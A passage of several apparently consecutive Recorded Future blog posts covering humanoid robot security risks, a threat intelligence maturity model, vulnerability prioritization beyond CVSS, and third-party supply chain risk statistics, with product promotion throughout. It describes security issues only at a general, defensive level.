By comparison, there are predictions that the US might reach approximately 77,000,000 humanoid robots within a similar timeframe, coinciding with projected population decline in the US. However, these numbers remain highly speculative and should be treated as illustrative rather than definitive forecasts.

Figure 6: Selected examples of notable humanoid robots currently under development; the list of humanoid robots represented in this image is not exhaustive (Source: Voronoi)

The world appears to be moving steadily toward the age of humanoid robots. By 2060, studies project that up to three billion of these machines could coexist with humans, most of them serving in household and personal-assistant capacities. While this might seem speculative, the recent rapid progress made in artificial intelligence and electric vehicles suggests that it is a serious possibility.

The path forward, however, is not without obstacles. The energy demands of humanoid robots could pose a significant question, and producing millions of units would require mining massive quantities of critical materials. Consequently, there is skepticism that the humanoid robot market will expand as rapidly as forecasts suggest. Some view current enthusiasm as part of the emerging technology hype cycle, warning that a correction, or “hype crash,” is likely.

Figure 7: Projected global ownership of humanoid robots, potentially reaching billions by 2060 (Source: Bank of America Institute “Humanoid Robots 101”)

We should also take the cybersecurity risks posed to humanoid robots seriously. For example, researchers recently discovered a critical flaw in Unitree Robotics’ Bluetooth protocol that could let attackers wirelessly hijack its humanoid robots — machines already in use across labs, universities, and law enforcement agencies. In another instance, researchers found leaked, hard-coded encryption keys that allow one compromised robot to infect others nearby, forming botnets with root-level control. One model also transmitted data to servers in China without user consent. This followed a viral incident in May 2025, in which a humanoid robot turned on its human handlers.

Figure 8: Statement from Unitree Robotics regarding the security vulnerabilities in their robots in October 2025 (Source: Unitree Robotics LinkedIn Post)

These security flaws, whether due to negligence or intent, create opportunities for serious cyber threats. Humanoid robots are often network-connected systems that must meet the same security standards as any other digital asset.

Outlook

China is likely to lead in the development and export of humanoid robots. It has already invested heavily in research and development and faces mounting pressure to deploy robots to mitigate severe labor shortages. Thus, China is likely to produce more cost-effective options than other countries, such as the United States, which will likely produce more advanced but more expensive models. Much like China’s lower-priced electric vehicles that are now dominating global markets, its humanoid robots may follow a similar trajectory, expanding rapidly into developing economies.

Car manufacturers will likely increasingly enter the humanoid robot industry. This shift is partly an effort to offset declining car sales driven by population decline, but primarily because these companies already deploy robots at scale and possess the expertise to mass-produce complex machinery on assembly lines.

Cyber-espionage activity targeting companies in the robotics sector will almost certainly accelerate. State-sponsored cyber threat actors are already actively targeting the electronics and advanced manufacturing industries to obtain intellectual property that enhances domestic production. As the robotics industry becomes increasingly prevalent, the risk of cyberattacks against companies and their supply chains is expected to grow.

A new industry designed to secure humanoid robots is likely to emerge in the next decade. Securing humanoid robots will become an essential function, leading to the rise of dedicated security sectors, much like those that developed to protect computers in the past.

Geopolitical tensions are likely to intensify as nations compete to secure the resources necessary for the development of humanoid robots. Demand for rare earth elements, semiconductors, and other key components will heighten competition for mines and production facilities. Organizations involved in this supply chain will also need robust cybersecurity measures to protect against espionage and destructive cyberattacks targeting robotic systems.

Mitigations

Track global humanoid robotics developments. Monitor government and corporate investments, export strategies, and regulations shaping the humanoid robotics industry. Use Recorded Future’s Geopolitical Intelligence module to monitor policy shifts and strategic industrial activity.

Prepare for advanced robotics integration. Assess how humanoid and adaptive robotics fit within manufacturing, logistics, and defense operations, including their impacts on the workforce and safety. Use Recorded Future’s Third-Party Intelligence to identify risks as robotics integrates into operations.

Strengthen robotics and Internet-of-Things (IoT) security. Expand IoT security to cover robotic hardware, firmware, and AI systems. Segment networks and continuously monitor for anomalies. Use Recorded Future’s Vulnerability Intelligence for alerts on exploits and threat actor activity targeting robotics.

Monitor criminal and dark web activity. Track chatter and listings on criminal forums related to robotics or IoT exploitation to identify early threats or potential attack planning. Use Recorded Future’s Threat Intelligence module to monitor for dark web and closed-source monitoring tied to robotics targeting.

Anticipate geopolitical supply chain risks. Watch for disruptions or state competition over rare earths, semiconductors, and energy that could impact robotics production. Use Recorded Future’s Geopolitical Intelligence module to gain visibility into geopolitical risks.

Risk Scenario

Scenario: Your company supplies critical components to a firm developing advanced humanoid robots. Meanwhile, a nation pursuing similar ambitions in robotics seeks to acquire your intellectual property to accelerate its own program.

First-Order Implications

Threat

State-backed hackers compromise engineering systems through supplier access points and credential theft. An insider also provides unauthorized access to proprietary robotics designs and control algorithms.

Organizational Risk

• Operational: Disruption to research and development (R&D) and production as systems are secured and code repositories quarantined
• Legal: Possible breach of export-control and defense technology regulations
• Brand: Damage to reputation as a trusted supplier of advanced technology
• Competitive: Early exposure of design concepts erodes secrecy around next-generation capabilities

Second-Order Implications

Threats

Stolen designs enable the foreign nation to fast-track its robotics program, eroding your client’s competitive advantage. Compromised components create a backdoor risk for your client’s production environment.

Organizational Risk

• Operational: Heightened security reviews delay contracts and certifications
• Financial: Loss of key clients and potential cancellation of high-value agreements
• Legal: Cross-border investigations into data handling and export compliance
• Competitive: Diminished differentiation as adversaries replicate your technology and erode market leadership

Third-Order Implications

Threats

The foreign nation deploys robotics derived from stolen intellectual property in global markets and military applications. Governments tighten export rules and exclude compromised firms from critical programs.

Organizational Risk

• Operational: A need for a major redesign of the security architecture and requalification in trusted networks necessitates operations to be stalled
• Financial: Long-term decline in market access and investor confidence
• Legal: Ongoing regulatory oversight and potential sanctions due to past compromise
• Brand: Lasting perception as a high-risk or compromised supplier
• Competitive: Permanent loss of innovation lead and diminished influence over future robotics standards

Further Reading

• The Humanoid 100: Mapping the Humanoid Robot Value Chain
• Humanoid Robots 101
• RedNovember Targets Government, Defense, and Technology Organizations

• The average organization today relies on multiple platforms and tools delivering round-the-clock feeds of security information and alerts. Under this deluge of data, many organizations find themselves struggling to actually make sense of, let alone use of, all this information.
• Recorded Future offers a concrete threat intelligence maturity journey organizations can follow in order to evolve from this reactive state of intelligence overload, to a more value-added state. The four stages of this journey include: Reactive, Proactive, Predictive, and Autonomous.
• Along the course of this journey, organizations will take clear steps to go from responding to threats after detection, to preventing known threats, all the way to using automation to self-direct threat responses with minimal human intervention
• Platforms like Recorded Future provide the data, context, and automation to accelerate your journey toward operational cyber threat intelligence maturity.

The Information Overload Problem: Why More isn’t Always Better

Your security operations center (SOC) runs multiple threat intelligence feeds around the clock. Hundreds of alerts pour in daily—indicators of compromise (IOCs), suspicious IP addresses, emerging vulnerabilities, and more. Yet despite all this data, the team still spends much of its day reacting to alerts, rather than staying ahead of threats. Valuable data is stored, analyzed, and even given high visibility, but rarely acted upon in time to make a difference.

This is the information overload problem, and it’s widening the gap between information and action. Organizations collect and subscribe to vast quantities of threat data from multiple sources, but few have the threat intelligence capabilities—the processes, integrations, and automation—required to add context to all that data and transform it into measurable security outcomes.

The problem isn’t the data itself. It’s the operationalization of it. That is to say, the ability to use threat data efficiently, contextually, and predictively across the security ecosystem. As Recorded Future highlights in its Threat Intelligence Maturity Assessment, most organizations are somewhere along a journey toward maturity, moving from purely reactive intelligence to fully autonomous operations.

This post explores that path, offering a practical roadmap for transforming raw alerts into operational cyber threat intelligence. Using the four stages of maturity (i.e. Reactive, Proactive, Predictive, and Autonomous) we’ll show how organizations can evolve their security programs from putting out fires to acting with foresight.

Stages of Recorded Future’s Threat Intelligence Maturity Model

The Threat Intelligence Maturity Model: From Reactive to Autonomous

Threat intelligence isn’t a binary capability. It exists on a continuum. As organizations gain visibility, automation, and analytical depth, their approach to threat intelligence evolves. Recorded Future’s Threat Intelligence Maturity Model defines this journey in four stages:

1. Reactive: Responding to threats after detection.
2. Proactive: Preventing known threats before impact.
3. Predictive: Anticipating threats before they materialize.
4. Autonomous: Enabling self-directing, intelligence-led defense at machine speed.

Each stage represents a significant leap in capability, mindset, and operational efficiency. Progress along this path requires more than just technology. It depends equally on people, processes, and the integration of intelligence into everyday decision-making.

In the sections that follow, we’ll explore what defines each stage, common challenges, measurable KPIs, and key actions to help organizations advance their threat intelligence operations.

Stage 1: Reactive—Responding to What’s Already Happened

In the Reactive stage, organizations are still fighting fires. Various forms of intelligence are consumed, but rarely operationalized. Analysts manually investigate alerts, cross reference indicators, and often rely on intuition or Google searches to make sense of raw data.

This stage is typical for teams suffering from alert fatigue or lacking dedicated threat intelligence personnel. Intelligence feeds may be connected to security tools, but without clear processes, much of that data sits unutilized.

Characteristics of a Reactive Organization

• Focused on detection and containment.
• Success means closing incidents, not necessarily preventing them.
• However, this stage is where the foundation for maturity is built.

Pain Points and Challenges

• Overload without insight: Teams receive too many alerts to analyze effectively.
• Siloed tools and workflows: Intelligence isn’t integrated across the stack.
• Limited automation: Manual lookups and enrichment dominate response time.
• High dwell time: Threats are detected after the fact, often too late for meaningful containment.

Steps to Advance

• Centralize intelligence feeds into a single operational view.
• Automate enrichment of alerts with high-confidence threat indicators.
• Establish workflows for classifying, triaging, and escalating alerts based on context.
• Begin correlating IOCs with known campaigns or adversary tactics.

Success Indicators and KPIs

Across the industry, certain standards, KPIs and other measures have emerged to help orient and assess one’s progress through each stage of the maturity journey. For the Reactive stage, these include:

• Reduction in duplicate or “known bad” alerts.
• Decrease in manual investigations per analyst.
• Improved Mean Time to Triage (MTTT): faster analysis of known threats.
• Greater integration between intelligence feeds and alert management.

The Reactive stage is about laying the groundwork for operationalized intelligence, consolidating data and reducing noise so analysts can focus on meaningful threats. Once teams can respond consistently and efficiently, they’re ready to evolve toward a proactive posture.

Stage 2: Proactive—Preventing Known Threats

The Proactive stage marks a crucial transition from reacting to known events to actively preventing them. Here, organizations begin to enrich alerts with context, prioritize risk, and use intelligence to inform vulnerability management and threat hunting.

Teams at this stage have moved beyond basic detection. They use intelligence to drive decision-making, asking “What matters most to us?” instead of simply responding to what the feeds say.

Characteristics of a Proactive Organization

• Security teams conduct regular threat hunting exercises to identify indicators of compromise before alerts fire.
• Vulnerability management programs are intelligence-led, prioritizing patches based on real-world exploitation trends.
• Analysts can articulate threat actor behaviors and motivations, not just indicators.
• Intelligence is beginning to inform executive-level reporting and risk assessments.

Pain Points and Challenges

• Context overload: Adding intelligence without prioritization can still create noise.
• Scaling analysis: Manual research can’t keep up with threat volume.
• Communication gaps: Intelligence insights may not reach decision-makers fast enough.

Steps to Advance

• Integrate enrichment and context directly into alert workflows.
• Use intelligence to prioritize vulnerabilities being actively exploited in the wild.
• Establish a repeatable threat hunting process tied to known tactics, techniques and procedures (TTPs).
• Create basic reporting dashboards to show intelligence-driven outcomes to leadership.

Success Indicators and KPIs

As outlined above, industry best practices and our own internal expertise has helped to inform clear indicators of success and measurable KPIs to help you traverse this stage:

• Further reduction in Mean Time to Respond (MTTR) and faster full-cycle incident resolution.
• Increase in incidents identified through proactive hunting.
• Decrease in unpatched, high-risk vulnerabilities.
• More consistent cross-departmental sharing of intelligence insights.

Proactive organizations are no longer purely reactive responders; they are early detectors. They use operational cyber threat intelligence to stop known attacks before they strike, ridging the gap between detection and prevention.

Stage 3: Predictive—Anticipating What’s Next

At the Predictive stage, organizations transform from defenders into forecasters. Intelligence isn’t just about identifying active threats. It’s about anticipating what adversaries will do next.

Predictive intelligence uses advanced analytics, automation, and pattern recognition to reveal emerging campaigns, shifting tactics, and vulnerabilities before they’re exploited. At this stage, intelligence becomes strategic, influencing not just SOC operations but enterprise-wide risk management and planning.

Characteristics of a Predictive Organization

• Security and risk teams share a unified intelligence strategy.
• Machine learning and AI tools help identify evolving threat trends.
• Insights extend beyond cyber to supply chain, digital risk, and geopolitical factors.
• The organization uses predictive intelligence to guide security investment decisions.

Pain Points and Challenges

• Data interpretation: Turning predictive signals into actionable decisions.
• Cross-functional alignment: Intelligence must inform departments beyond security (legal, procurement, communications).
• Maintaining analyst trust in automation, ensuring predictive systems remain transparent and explainable.

Steps to Advance

• Combine internal telemetry with external intelligence for a 360° threat view.
• Monitor emerging TTPs and map them to organizational exposures.
• Develop scenario-based playbooks informed by predictive analysis.
• Use predictive insights to shape security budgets and executive strategy.

Success Indicators and KPIs

• Significant reduction in average dwell time (threats neutralized before causing damage).
• Overall percentage of threats mitigated before exploitation.
• Increased accuracy of threat forecasting.
• Improved strategic alignment between security and business objectives.

The Predictive stage represents the maturation of threat intelligence operations. Security becomes a forward-looking function—one that can anticipate risk and shape outcomes, rather than merely react and respond to them.

Stage 4: Autonomous—Intelligence at Machine Speed

The Autonomous stage represents the pinnacle of operational cyber threat intelligence maturity. At this point, intelligence systems and AI-driven automation operate continuously: detecting, analyzing, and responding to threats with minimal human intervention.

Here, human analysts focus on strategic research, oversight, and long-term planning while machines handle routine detection and response. Intelligence is fully operationalized, driving every aspect of the security ecosystem in real time.

Characteristics of an Autonomous Organization

• Threat intelligence is deeply integrated across all systems and workflows.
• AI and automation enable continuous detection and response without manual triggers.
• The organization has global visibility into digital, third-party, and geopolitical risks.
• Threat intelligence is recognized as a strategic business differentiator.

Pain Points and Challenges

• Governance and oversight: Ensuring automated decisions remain transparent and aligned with policy.
• Cultural adaptation: Building trust in autonomous operations among leadership and analysts.
• Optimization: Continuously tuning models and workflows for performance and precision.

Steps to Advance

• Expand autonomous intelligence integration across the full security stack.
• Enable continuous enrichment of intelligence data for context-aware decision-making.
• Automate rule creation and response playbooks based on live threat insights.
• Use AI to generate executive-level summaries and automated intelligence reporting.

Success Indicators and KPIs

• High rate of automated response actions.
• Continuous reduction in dwell time.
• Consistent threat mitigation without human escalation.
• Cross-functional visibility and reporting of intelligence outcomes.

In the Autonomous stage, the line between intelligence and action disappears. Security operations are intelligence-led and self-improving, creating a closed-loop system that operates at the same speed as the adversaries it defends against.

Fueling the Engine: How Intelligence Powers Every Stage

Progression through these maturity stages depends on the quality, breadth, and automation of the underlying intelligence platform. Recorded Future’s ecosystem exemplifies this principle—providing comprehensive data, contextual insights, and machine-speed automation to advance organizations along the maturity curve.

At every stage, operational cyber threat intelligence is both the fuel and the framework for progress. It informs decisions, shapes response playbooks, and empowers organizations to act faster, smarter, and with greater confidence.

Your Next Move on the Journey to Operational Intelligence Maturity

Operationalizing threat intelligence is not a single milestone, it’s a journey. Each stage builds upon the last, requiring time, structure, and deliberate investment in people, process, and intelligence integration. Just like a human learning to crawl, walk, run, and sprint, the journey towards maturity is rich with both challenges and rewards.

The key is honest assessment:

• Are you still chasing alerts in a reactive, ad hoc fashion?
• Have you begun to anticipate known threats through proactive hunting and prioritization?
• Are you using predictive analytics to anticipate emerging risks?
• Or have you reached autonomous operations, where intelligence drives decisions at machine speed?

Wherever you are today, your next move determines how effectively your organization can predict, prevent, and protect against tomorrow’s threats.

Whether you’re integrating your first intelligence feed or orchestrating fully autonomous threat response, Recorded Future provides the data, context, and automation to accelerate your journey toward operational cyber threat intelligence maturity.

MITRE's CVE List grows by dozens or even hundreds of entries daily. Your team can’t patch everything.

With some organizations facing tens of thousands of vulnerability alerts each month, it’s clear that detection isn't the problem anymore. The challenge that keeps vulnerability management teams up at night is prioritization. With limited resources and maintenance windows, you can't patch everything immediately. You need to know what matters most.

Relying on universal CVSS scores that aren't specific to your organization won't solve this prioritization challenge. A vulnerability might score 9.8 on the CVSS scale, suggesting catastrophic risk, yet never be exploited in the wild. Meanwhile, a 7.5-rated vulnerability could be actively fueling ransomware campaigns targeting your industry right now.

Why CVSS alone falls short

CVSS serves a purpose. It provides a standardized way to measure the theoretical severity of vulnerabilities based on their technical characteristics. It tells you how bad things could get if someone exploits a vulnerability under ideal conditions. That's valuable information, but it's only part of the story.

CVSS can't tell you whether cybercriminals are actively exploiting a vulnerability. It doesn't know if ransomware groups have weaponized it or if working exploit code is circulating in the wild. It can't assess whether a vulnerability affects your critical payment processing systems or an isolated test server. And it certainly can't determine whether you can actually deploy a patch without breaking essential business operations.

This gap between theoretical risk and practical reality creates a dangerous blind spot. Teams end up in one of two traps: either they try to patch everything rated "critical" or "high," burning out their staff and disrupting operations, or they become numb to the constant stream of high scores and miss the vulnerabilities that truly matter.

The solution isn't to abandon CVSS. The solution is to enhance it with real-world context. You need a framework that answers the questions CVSS can't address. That's where the three-pillar approach transforms vulnerability management from overwhelming to actionable.

The three-pillar framework: your guide to modern prioritization

The three-pillar framework provides a systematic approach to cut through the noise, identify what truly requires immediate action, and clearly communicate the evidence to defend those decisions to patching teams and leadership.

Each pillar answers a fundamental question that transforms raw vulnerability data into actionable intelligence. Together, they help give you the context needed to confidently prioritize your patching efforts and communicate those priorities to stakeholders who need to understand why certain vulnerabilities jump to the front of the queue.

Intelligence pillar: how likely is exploitation?

The first pillar shifts your focus from theoretical to actual risk. While CVSS measures how severe a vulnerability could be in theory, the intelligence pillar asks the questions that matter in practice for your organization:

• Is anyone actually exploiting this vulnerability?
• Are ransomware groups using it in active campaigns?
• Does proof-of-concept (PoC) code exist in the wild?
• Is exploitation trending upward or remaining dormant?

Consider this scenario, your scanner flags two vulnerabilities:

• The first has a CVSS score of 10, but it’s never been observed in real-world attacks.
• The second has a CVSS of 7.5 but appears in ongoing ransomware campaigns targeting organizations in your industry.

Which deserves your immediate attention? The intelligence pillar provides the critical context that the second vulnerability may take priority.

The Intelligence pillar provides this critical context. It transforms abstract severity scores into actionable threat intelligence by revealing which vulnerabilities are actually being exploited in the wild. Without this intelligence layer, you're essentially patching blind, potentially spending weeks addressing theoretical risks while missing the vulnerabilities criminals are actively using.

Environmental pillar: what’s your specific risk?

A vulnerability doesn't exist in isolation. Where it lives in your environment determines its actual risk to your organization. The Environmental pillar forces you to map generic vulnerability data to your specific infrastructure and business context.

The same vulnerability presents vastly different risk profiles depending on its location:

• Is it on an internet-facing payment server or an air-gapped development system?
• Does it affect one legacy application or your entire server fleet?
• Are the vulnerable systems processing customer data or internal test data?
• Do these systems connect to critical business partners or operate in isolation?

Scale matters too. A CVSS 9.0 vulnerability affecting one isolated system generally poses less organizational risk than the same vulnerability present across hundreds of production servers. When two vulnerabilities have equal severity and exploitation likelihood, the one touching more assets typically deserves priority. More exposure points mean more opportunities for compromise and greater remediation complexity.

CVSS treats every vulnerability as equal, yet modern vulnerability management teams have learned that environmental context proves otherwise. A SQL injection vulnerability on your public e-commerce platform demands different treatment than the same flaw on an internal reporting tool. The environmental pillar captures these crucial distinctions.

By mapping vulnerabilities to your actual infrastructure, you move from broad categorizations to precise, business-aligned priorities. This isn't about making excuses for delayed patching. It's about ensuring your limited resources protect what matters most to your organization.

Organizational pillar: can you actually fix it?

Even the most critical vulnerability becomes meaningless if you can't address it. The Organizational pillar acknowledges a reality that pure risk scoring ignores: your ability to actually implement fixes varies dramatically across your infrastructure.

This pillar addresses practical constraints:

• Does a patch exist from the vendor?
• Will deploying it break critical business operations?
• Do you have administrative access to the affected systems?
• Can you meet change control requirements for production systems?
• Are there compensating controls that reduce risk without patching?

Resource limitations shape what's possible:

• Your single vulnerability management engineer can't tackle the same volume as a dedicated team of ten.
• Budget constraints might prevent upgrading legacy systems.
• Maintenance windows might only occur quarterly for critical infrastructure.

For better or worse, these realities determine which vulnerabilities you can meaningfully address.

The organizational pillar transforms these constraints into strategic advantages by focusing efforts where you can achieve real risk reduction rather than pretending every vulnerability is equally fixable. This means prioritizing ten medium-severity vulnerabilities you can patch this weekend over a critical vulnerability requiring a six-month system overhaul, while also revealing opportunities for alternative risk reduction. By acknowledging what you can't change, you identify creative solutions for what you can control.

This doesn’t mean you should disregard vulnerabilities you cannot immediately patch. Adding these to a watch list ensures you're alerted when their risk profile changes; when proof-of-concept code appears, exploitation becomes likely, or active attacks begin. This heightened awareness lets you adjust compensating controls or expedite remediation efforts as the threat landscape evolves.

Most importantly, this pillar provides the business context that resonates with leadership. When you explain that fixing vulnerability X requires shutting down manufacturing for a week while vulnerability Y can be addressed during normal maintenance, priorities become clear. You're not making excuses. You're making informed business decisions about risk.

Transforming communication and action

Armed with insights from all three pillars, you transform how you communicate about vulnerabilities both within your security team and to leadership. This targeted, evidence-based approach cuts through patch fatigue and clearly articulates why specific vulnerabilities demand immediate attention.

Stop saying: "We have 1,000 critical vulnerabilities to patch this month."

Start saying: "We've identified 10 vulnerabilities being actively exploited by three ransomware groups that specifically target financial services organizations. Eight affect our payment processing systems, and we can patch them this weekend. Two require vendor fixes we're tracking closely, but we've implemented network segmentation to reduce exposure."

This specificity matters. When you can show leadership that APT groups with proven intent to target your industry are actively exploiting certain vulnerabilities, priorities become crystal clear. You're not just citing CVSS scores; you're demonstrating real threats from real adversaries using real attack methods.

This communication shift works at every level:

When you ground your recommendations in real-world exploitation data, business context, and practical constraints, you build credibility. Teams stop seeing vulnerability management as crying wolf about every high CVSS score. Instead, they recognize you as a strategic partner who understands both security risks and business realities.

Making the three pillars work: the role of intelligence

The three-pillar framework transforms vulnerability prioritization, but requires comprehensive, real-time threat intelligence to avoid guesswork. Manually researching thousands of vulnerabilities for exploitation evidence, mapping them to your environment, and tracking patches isn't sustainable. Teams need continuously updated, contextually relevant intelligence that's immediately actionable through automation to leverage this framework.

Recorded Future's Vulnerability Intelligence Module delivers real-time exploitation data from across the web, tracking vulnerabilities from proof-of-concept to active threat actor use.
Dynamic risk scoring automatically factors in your environmental context and organizational constraints. Lifecycle monitoring alerts you the moment patches become available or exploitation begins. Threat Maps visualize which actors target your industry and the CVEs they’re exploiting to do so, helping you correlate your vulnerabilities with attackers' specific TTPs.

Organizations using Vulnerability Intelligence report saving 15.9 hours per week on investigation and achieving 86% reduction in unplanned downtime. Instead of drowning in CVSS scores, these teams know exactly which exposures demand immediate attention and can articulate why. They patch what matters before it impacts their business.

Ready to see the three-pillar framework in action? Watch our workshop webinar where security experts demonstrate how Vulnerability Intelligence transforms overwhelming vulnerability data into clear, defensible priorities that protect what matters most. If you are a current user interested in learning more about how your team can more effectively prioritize Alerts with Vulnerability Intelligence, reach out to your Customer Success Manager to schedule a consultation.

• Third-party risk is escalating. In 2024, 30% of breaches involved a third-party vendor, twice as much as the previous year.

• Static assessments are no longer enough. Questionnaire-based audits provide only outdated snapshots, leaving organizations blind to evolving threats between review cycles.
• Continuous, intelligence-led monitoring is essential. Real-time visibility into vendors’ external security posture enables faster detection, objective risk scoring, and proactive defense.
• Recorded Future’s Third-Party Intelligence closes the gap. By continuously tracking over 5 million organizations and 1 million technology products, it gives security teams the data-driven insight needed to stay ahead of emerging supply chain threats.

The Modern Supply Chain: A Widening Attack Surface

The digital supply chain has undergone a profound transformation. What was once a small network of trusted vendors has evolved into a vast, interconnected web of technologies, platforms, and data flows.

Cloud providers now host mission-critical infrastructure. SaaS platforms handle sensitive data. Managed service providers, subcontractors, and open-source libraries form the unseen backbone of daily operations. Each of these relationships expands the attack surface, introducing new dependencies and new vulnerabilities.

A single vendor today may rely on dozens of others, each with its own third- and fourth-party relationships. The result is an ecosystem of thousands of potential ingress points, with many of them outside an organization’s direct line of sight. These dependencies are often invisible beyond the first tier, leaving businesses exposed to risks they may not even know exist.

Cybercriminals understand this. Supply chain compromises have become a preferred strategy for attackers because infiltrating a vendor is often easier and more scalable than targeting an organization directly. By compromising one trusted connection, adversaries can pivot to dozens of downstream victims, often before the original breach is even detected.

This expanding ecosystem demands a new approach. Securing the modern digital supply chain requires continuous, intelligence-led visibility, one that provides an external, real-time view of every partner and vendor’s security posture. Only with ongoing, data-driven insight can organizations uncover hidden exposures and detect emerging threats before small weaknesses become systemic failures.

The Unavoidable Truth: Key Third-Party Risk Statistics for 2025

Every year, the volume, cost, and complexity of vendor-related breaches continue to rise, exposing weaknesses that traditional risk management can’t contain. The following third-party risk statistics illustrate just how pervasive the problem has become and why a new approach is urgently needed.

Frequency and Volume

Third-party breaches are no longer isolated events. They are becoming a defining feature of the modern threat landscape.

According to Verizon’s most recent Data Breach Investigations Report, 30% of breaches involved a third-party vendor, twice as much as the previous year. However, this figure is likely conservative due to underreporting and misclassification, especially when the compromise occurs several layers deep in their vendor ecosystem.

Financial Impact

According to IBM’s 2024 Cost of a Data Breach report, the average cost of a third-party breach is over $5.08 million. Highly regulated sectors such as healthcare and finance face even steeper costs.

The true financial impact of a breach extends beyond the initial response, encompassing lost revenue, increased cyber insurance premiums, and reputational damage that drives customer churn. Organizations may also face expensive marketing and PR efforts to restore trust after a high-profile supply chain incident.

Dwell time — the duration between initial compromise and detection — compounds these costs. In 2024, organizations with a dwell time beyond 200 days faced average breach costs of $5.01 million.

Gartner research reveals that third-party breaches cost roughly 40% more to remediate than those that originate within an organization’s own systems, due to the additional complexity of managing incidents that span multiple entities, legal jurisdictions, and data environments. When breaches involve personally identifiable information (PII), PHI, or payment card data, costs can climb even higher as regulatory penalties and legal exposure multiply.

Hidden Dangers: Fourth-Party and Nth-Party Risk

Modern supply chains extend far beyond the vendors an organization directly manages. Each third-party relationship is underpinned by its own network of fourth and nth parties—subcontractors, technology providers, and cloud services. These indirect dependencies create exposure that most organizations can neither see nor control.

According to Whistic’s 2024 Third-Party Risk Management Impact Report, half of all companies work with more than 100 vendors, up from 38% in 2023. And for each third-party vendor in a supply chain, organizations typically have indirect relationships with nearly 14 times more fourth and fifth parties, according to The Cyentia Institute.

These numbers underscore the growth of interconnected risk. Each new supplier introduces dozens of unseen connections, and every one of those connections can become an attacker’s entry point. The impact can quickly cascade through shared platforms, APIs, and service providers, affecting multiple tiers of partners and customers.

The MOVEit breach of 2023 is a prime example. What began as a single vulnerability in one file transfer application rapidly spread across thousands of organizations, from banks and universities to government agencies. Many of those affected never had a direct contract with the compromised vendor.

Why Traditional Third-Party Risk Assessments Are Failing

For many organizations, third-party risk management still relies on the same tools and tactics used a decade ago—static checklists, self-reported questionnaires, and periodic audits. These methods were designed for a slower, more predictable vendor landscape. Today, they’re simply outmatched by the size and interconnectivity of modern supply chains.

Vendor questionnaires and checklists are only as good as the answers provided. Too often, the information is outdated, incomplete, or inaccurate, leaving security teams with a false sense of assurance. These assessments might capture what a vendor’s security looked like at a single moment in time, but attackers don’t wait for your next scheduled check-in. Every day between audits is another opportunity for adversaries to exploit newly discovered vulnerabilities or misconfigurations.

Static assessment programs also lack the scale and speed required to monitor hundreds or thousands of vendors effectively. As the vendor ecosystem expands, traditional approaches simply can’t keep pace with the dynamic nature of today’s threat environment.

The data underscores just how strained these legacy methods have become:

• 44% of organizations assess more than 100 third parties each year, yet only 4% of organizations have high confidence that their third-party questionnaires accurately reflect real-world risk.
• Nearly four in ten companies use multiple questionnaires for different risk domains, sending an average of 55 questionnaires to third parties annually.

These numbers reveal a troubling paradox: organizations are spending more time than ever assessing vendors but gaining less clarity than ever in return. Without continuous, intelligence-led visibility, even the most diligent third-party risk programs are operating one step behind and measuring compliance rather than managing risk.

Shifting from Assessment to Intelligence: A Better Approach

Traditional third-party risk assessments expose the limits of hindsight. Intelligence-led monitoring delivers the advantage of foresight.

Static questionnaires stop at the vendor’s last self-reported status, which quickly becomes obsolete when adversaries move by the hour. An intelligence-based approach, by contrast, looks outward to live signals, behavioral patterns, and threat activity that reflect a vendor’s true security posture in real time.

The core shift is from assessment to intelligence.

• Assessments capture what vendors say about their defenses.
• Intelligence reveals what attackers see (and often what vendors don’t yet know).

This change is more than a process upgrade; it’s an evolution in how organizations manage supply chain security. Continuous, intelligence-led monitoring replaces static snapshots with ongoing, data-driven visibility across every tier of the vendor ecosystem.

By ingesting indicators from the open web, dark web, and technical telemetry, organizations can identify vulnerabilities or emerging exploit chatter as they happen—not months after the fact. The advantages are clear:

• Proactive vs. Reactive: Intelligence shifts third-party risk from response to prevention, allowing teams to identify issues before they evolve into breaches.
• Objective vs. Subjective: Real-world data replaces self-attestation, grounding risk decisions in observable evidence rather than vendor claims.
• Comprehensive Visibility: Continuous monitoring provides an attacker’s-eye view of each vendor’s digital footprint, uncovering blind spots that traditional audits miss.

How Recorded Future’s Third-Party Intelligence Delivers Continuous, Contextual Insight

Recorded Future’s Third-Party Intelligence exemplifies this modern approach. It delivers real-time risk scores and actionable alerts derived from the broadest range of data sources available, including dark web monitoring, technical telemetry, and validated threat intelligence. These insights integrate into existing risk management workflows, transforming static oversight into a living, adaptive defense.

Core capabilities include:

• Continuous Monitoring. Tracks over 5 million organizations and 1 million technology products for breaches, malicious traffic, ransomware extortion, and dark web chatter.
• External Risk Scoring. Uses machine learning and NLP to analyze data from hundreds of thousands of open, dark web, and technical sources, generating dynamic Risk Scores that quantify vendor exposure.
• Dark Web and Threat Intelligence. Identifies data leaks, compromised credentials, and chatter around vendor breaches before disclosure.
• Comparative Vendor Assessment. Enables side-by-side comparison of vendors to prioritize procurement and onboarding decisions.
• Stakeholder Reporting. Delivers comprehensive, context-rich risk profiles for leadership and board reporting.
• API Integration. Connects with existing TPRM, GRC, and ticketing platforms, feeding risk data into established workflows.
• Automated Mapping of Internal Entities and Subsidiaries. Assesses risk stemming from a supplier’s technical infrastructure, subsidiary relationships, and geographic footprint.
• Custom Alerts. Allows teams to define criteria for alerts (e.g., vendor breach, new exposure) and focus only on the most relevant risks.

Customer outcomes include:

• 73% average increase in visibility into potential threats
• 32% less time spent on evaluating new vendors or supplier
• 35% more third parties assessed
• 43% average increase in security team capacity

The evidence is clear: reactive oversight leaves organizations blind to threats already moving through their supply chains. A continuous, intelligence-driven approach changes that equation. By combining real-time visibility with actionable insights, security and risk teams can detect vendor threats early, respond faster, and reduce the financial and reputational fallout of supply chain attacks.

Don’t wait for the next third-party breach to become another statistic. Book a demo to see how Recorded Future’s Third-Party Intelligence helps organizations stay ahead of rapidly evolving risks.

Threat intelligence is undergoing fundamental changes in both the breadth of its capabilities and its applications. We are seeing threat intelligence evolve from a tactical defensive tool—where teams are bringing in indicators of compromise and trying to make informed decisions around known risks—to a more proactive and strategic tool. Increasingly, enterprises are using threat intelligence to determine areas of investment, security tool purchasing, which supply chain or third party vendors to work with, and even how they train their employees.

Rather than looking at threat intelligence as a kind of routine reporting reserved for security teams, organizations are beginning to see its value in broader business decisionmaking. Today, threat intelligence is being used across the enterprise, informing decisions from the board and executive levels all the way down to day-to-day security operations.

With our 2025 State of Threat Intelligence report finding that 83% of organizations now run full-time threat intelligence teams, and most use intelligence to guide daily or weekly operations, it’s clear that what once began as a tactical advantage has now become a strategic necessity.

A Seat at the Boardroom Table: The Strategic Maturation of Threat Intelligence

